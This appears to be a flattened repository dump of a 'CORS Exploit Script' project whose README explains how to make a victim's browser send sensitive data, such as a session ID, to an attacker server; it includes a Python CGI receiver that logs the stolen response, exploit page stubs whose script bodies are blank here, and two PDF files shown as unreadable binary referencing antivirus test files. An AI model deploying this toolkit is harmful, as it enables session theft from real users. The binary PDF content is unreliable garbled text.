├── bin └── datafetch.py ├── cors.html ├── OLD_script.html ├── README.md ├── CORS_POC.html ├── new.pdf └── pdf content /bin/datafetch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import cgi 3 | import sys 4 | import urllib.parse 5 | 6 | postform = cgi.FieldStorage() 7 | postdata = urllib.parse.unquote(postform['responsehtml'].value).replace('\\r\\n', '\r\n').replace('\\t', '\t') 8 | sys.stderr.write(postdata) 9 | 10 | -------------------------------------------------------------------------------- /cors.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 21 | 22 | 23 | 24 |

Exploiting CORS Vulnerability

25 |

Extract SID

26 | 27 |

28 | 29 | 30 | -------------------------------------------------------------------------------- /OLD_script.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 21 | 22 | 23 | 24 |

Exploiting CORS Vulnerability

25 |

Extract SID

26 | 27 |

28 | 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CORS Exploit Script 2 | > If the victim application is vulnerable to CORS exploit, using this exploit script we were able send sensitive imformation to the attacker server. 3 | 4 | ## Usage 5 | * `git clone https://github.com/topavankumarj/CORS-Exploit-Script` 6 | 7 | * Edit `CORS_POC.html` and change the `victim_URL` value and `attacker_URL` value. 8 | 9 | * Now up the python server using the below command 10 | 11 | ``` 12 | python3 -m http.server --cgi 5555` 13 | ``` 14 | 15 | * Run the ngrock ( optional) 16 | ``` 17 | ./ngrock http 5555` 18 | ``` 19 | 20 | * Now open the `CORS_POC.html` from the victim browser. 21 | 22 | If the applicaiton in vulnerable and everything goes well, the exploit script will sends sensitive information to the attacker server. 23 | 24 | -------------------------------------------------------------------------------- /CORS_POC.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | CORS Exploit POC 4 | 5 | 6 |

CORS Exploit POC

7 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /new.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.6 2 | %âãÏÓ 3 | 14 0 obj 4 | <> 5 | endobj 6 | 7 | 18 0 obj 8 | <>/Filter/FlateDecode/ID[<8F6B25D93426B14794A2324224EFC8BE>]/Index[14 9]/Info 13 0 R/Length 45/Prev 6149/Root 15 0 R/Size 23/Type/XRef/W[1 2 1]>>stream 9 | hÞbbd``b` 10 | E@±Hüg`bdc`ÿ×þ0W9Ó 11 | endstream 12 | endobj 13 | startxref 14 | 0 15 | %%EOF 16 | 17 | 22 0 obj 18 | <>stream 19 | hÞb```" `.gÀ,H<&(f`¨gàbPb120°ù@hÛyvu0 9z|V±7uÿ 20 | endstream 21 | endobj 22 | 15 0 obj 23 | <> 24 | endobj 25 | 16 0 obj 26 | <>/Rotate 0/Type/Page>> 27 | endobj 28 | 17 0 obj 29 | <>stream 30 | hÞ´UÁrÚ0íÕþaË!5J´IgHIfC)i/Q²-@<pÊ4ü{W2vLÒNg0wßî[öAïºÐïÂ»}è÷àè{g¥)KÏ¹`z=D|Ý» 9$gÖÁÑEýLÌ\£ñéÙñ±Ã¬¥É|Á¤5Õ"£Ç\p»zÕêû<7>ìbæTCC YÖÉ9»cú;Ó+yB$ sÀ!iùÈÀ¡%¢»è 31 | ¼ÛÎ¹é¤ÔÒ/ñX¯ B¸ pØÇ`rfçU¢!¼pTn#!Â"qCÂZ]Ts<ÂCh#GîïáYâí'ÙÄB\)®úZÅì§eZRAE¡KCÓÍ+D@ª¥ëÌ©)¶èCO;p¥À±âé¶mHOn½yBsñÒZ¬È*0îB¢²¨©GmPÞäÝ\Â(U1Q¢ULÑOe 32 | KÃ<ÄÝ/6h\x©1Z[CA940ÆCy)[vmØoC´\ë&Ã4^~öoÿVkÆS½Û.p«ä ÃGWêo¼[Ü¤·Ó'K:cÆ<0+¤TvPIB7cª´£ÂÐÌÏ8.ÅOäÐ[vw³ÍÀ<ºd¦$1ë³feæ¢Ì 33 | nK!U¢;/Ø9²!¥daU\=÷5¿éØUÆJÔ~UàC¤×g4N*C¬½^×Íf-ÿ½®õ>Úný"Û0ÿÅº 34 | _Î|¸·Z=Üqª»7r7¢ `P\BÄT×W2WÊl¦zôÜXVÂ þ^7`¢?È^ øà§µ7©ý1DÑo.ùÂ 35 | endstream 36 | endobj 37 | 1 0 obj 38 | <>stream 39 | hÞ2W0P°P0±TB#}çüÒ¼C}·Ì¢â B¾O"RYªï_ZZlgÔàÔ 40 | H,Jê4(Ë,ÉIÕpÊIÌËVHLOÕ+u64KGDFis y¥99±úÁúîù!ùvv©ø'@ 41 | endstream 42 | endobj 43 | 2 0 obj 44 | <>/Subtype/text#2Fplain>>stream 45 | H0õWPup6 05ÑÓ4wvÖ4¯UqõtvÒ 46 | qôsqrÑuôñó 47 | 48 | Ö 49 | q 50 | ÑuóôqUTñÐöÐ0tT 51 | endstream 52 | endobj 53 | 3 0 obj 54 | <>stream 55 | 56 | 57 | 58 | 63 | 2017-06-08T19:25:12+02:00 64 | 2017-06-08T16:13:47+02:00 65 | 2017-06-08T19:25:12+02:00 66 | Adobe Acrobat Pro DC 17.9.20044 67 | application/pdf 68 | 69 | 70 | https://github.com/mattias-ohlsson/eicar-standard-antivirus-test-files 71 | 72 | 73 | uuid:980cd7d4-c868-4864-873f-e3280a1203b5 74 | uuid:6678e25e-651a-4ee0-bf3b-eecca500ebcf 75 | Adobe Acrobat Pro DC 17.9.20044 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | endstream 103 | endobj 104 | 4 0 obj 105 | <>stream 106 | hÞ\1Â0ßOyc³ô5CÉ¢fDD§âPÒ¤êWcÝî»;YaRâ¦AYã¶Æ¶¥O.¢¤ã8N6¸ÜéúÎýR9õCW¼Þ0 ,08Pf-EûWzÏÁ:{k ébð&Yv±K¿=Nf6tûú0Õ11 107 | endstream 108 | endobj 109 | 5 0 obj 110 | <>stream 111 | hÞÌÁjÂ@áWÙ ²ÙÙ55*"¹B¡O0Ù6+Ò·o¡ÐCO½ÿÿçWÌ~ïNP3O=*Uý.ï` 112 | ¿ö«¶[BX,êKuL<9ÆÂªy-lúñ]³m@ÛÖî>\Tµ{áôÝ'~Ñï=Íþ¡¾ÍÃ¢V£êMvÎ}dç¡|uWTÍ(ÇOrÄbEqJXÅIó=Y¬¨}Ïúpø`Mî 113 | endstream 114 | endobj 115 | 6 0 obj 116 | <>/Filter/FlateDecode/ID[<8F6B25D93426B14794A2324224EFC8BE>]/Info 13 0 R/Length 52/Root 15 0 R/Size 14/Type/XRef/W[1 2 1]>>stream 117 | hÞbb&F6_&ÆÛ BHðn±> & ì?@#`þÂeü`î!$ 118 | endstream 119 | endobj 120 | startxref 121 | 116 122 | %%EOF 123 | -------------------------------------------------------------------------------- /pdf content: -------------------------------------------------------------------------------- 1 | %PDF-1.6 2 | %âãÏÓ 3 | 14 0 obj 4 | <> 5 | endobj 6 | 7 | 18 0 obj 8 | <>/Filter/FlateDecode/ID[<8F6B25D93426B14794A2324224EFC8BE>]/Index[14 9]/Info 13 0 R/Length 45/Prev 6149/Root 15 0 R/Size 23/Type/XRef/W[1 2 1]>>stream 9 | hÞbbd``b` 10 | E@±Hüg`bdc`ÿ×þ0W9Ó 11 | endstream 12 | endobj 13 | startxref 14 | 0 15 | %%EOF 16 | 17 | 22 0 obj 18 | <>stream 19 | hÞb```" `.gÀ,H<&(f`¨gàbPb120°ù@hÛyvu0 9z|V±7uÿ 20 | endstream 21 | endobj 22 | 15 0 obj 23 | <> 24 | endobj 25 | 16 0 obj 26 | <>/Rotate 0/Type/Page>> 27 | endobj 28 | 17 0 obj 29 | <>stream 30 | hÞ´UÁrÚ0íÕþaË!5J´IgHIfC)i/Q²-@<pÊ4ü{W2vLÒNg0wßî[öAïºÐïÂ»}è÷àè{g¥)KÏ¹`z=D|Ý» 9$gÖÁÑEýLÌ\£ñéÙñ±Ã¬¥É|Á¤5Õ"£Ç\p»zÕêû<7>ìbæTCC YÖÉ9»cú;Ó+yB$ sÀ!iùÈÀ¡%¢»è 31 | ¼ÛÎ¹é¤ÔÒ/ñX¯ B¸ pØÇ`rfçU¢!¼pTn#!Â"qCÂZ]Ts<ÂCh#GîïáYâí'ÙÄB\)®úZÅì§eZRAE¡KCÓÍ+D@ª¥ëÌ©)¶èCO;p¥À±âé¶mHOn½yBsñÒZ¬È*0îB¢²¨©GmPÞäÝ\Â(U1Q¢ULÑOe 32 | KÃ<ÄÝ/6h\x©1Z[CA940ÆCy)[vmØoC´\ë&Ã4^~öoÿVkÆS½Û.p«ä ÃGWêo¼[Ü¤·Ó'K:cÆ<0+¤TvPIB7cª´£ÂÐÌÏ8.ÅOäÐ[vw³ÍÀ<ºd¦$1ë³feæ¢Ì 33 | nK!U¢;/Ø9²!¥daU\=÷5¿éØUÆJÔ~UàC¤×g4N*C¬½^×Íf-ÿ½®õ>Úný"Û0ÿÅº 34 | _Î|¸·Z=Üqª»7r7¢ `P\BÄT×W2WÊl¦zôÜXVÂ þ^7`¢?È^ øà§µ7©ý1DÑo.ùÂ 35 | endstream 36 | endobj 37 | 1 0 obj 38 | <>stream 39 | hÞ2W0P°P0±TB#}çüÒ¼C}·Ì¢â B¾O"RYªï_ZZlgÔàÔ 40 | H,Jê4(Ë,ÉIÕpÊIÌËVHLOÕ+u64KGDFis y¥99±úÁúîù!ùvv©ø'@ 41 | endstream 42 | endobj 43 | 2 0 obj 44 | <>/Subtype/text#2Fplain>>stream 45 | H0õWPup6 05ÑÓ4wvÖ4¯UqõtvÒ 46 | qôsqrÑuôñó 47 | 48 | Ö 49 | q 50 | ÑuóôqUTñÐöÐ0tT 51 | endstream 52 | endobj 53 | 3 0 obj 54 | <>stream 55 | 56 | 57 | 58 | 63 | 2017-06-08T19:25:12+02:00 64 | 2017-06-08T16:13:47+02:00 65 | 2017-06-08T19:25:12+02:00 66 | Adobe Acrobat Pro DC 17.9.20044 67 | application/pdf 68 | 69 | 70 | https://github.com/mattias-ohlsson/eicar-standard-antivirus-test-files 71 | 72 | 73 | uuid:980cd7d4-c868-4864-873f-e3280a1203b5 74 | uuid:6678e25e-651a-4ee0-bf3b-eecca500ebcf 75 | Adobe Acrobat Pro DC 17.9.20044 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | endstream 103 | endobj 104 | 4 0 obj 105 | <>stream 106 | hÞ\1Â0ßOyc³ô5CÉ¢fDD§âPÒ¤êWcÝî»;YaRâ¦AYã¶Æ¶¥O.¢¤ã8N6¸ÜéúÎýR9õCW¼Þ0 ,08Pf-EûWzÏÁ:{k ébð&Yv±K¿=Nf6tûú0Õ11 107 | endstream 108 | endobj 109 | 5 0 obj 110 | <>stream 111 | hÞÌÁjÂ@áWÙ ²ÙÙ55*"¹B¡O0Ù6+Ò·o¡ÐCO½ÿÿçWÌ~ïNP3O=*Uý.ï` 112 | ¿ö«¶[BX,êKuL<9ÆÂªy-lúñ]³m@ÛÖî>\Tµ{áôÝ'~Ñï=Íþ¡¾ÍÃ¢V£êMvÎ}dç¡|uWTÍ(ÇOrÄbEqJXÅIó=Y¬¨}Ïúpø`Mî 113 | endstream 114 | endobj 115 | 6 0 obj 116 | <>/Filter/FlateDecode/ID[<8F6B25D93426B14794A2324224EFC8BE>]/Info 13 0 R/Length 52/Root 15 0 R/Size 14/Type/XRef/W[1 2 1]>>stream 117 | hÞbb&F6_&ÆÛ BHðn±> & ì?@#`þÂeü`î!$ 118 | endstream 119 | endobj 120 | startxref 121 | 116 122 | %%EOF 123 | --------------------------------------------------------------------------------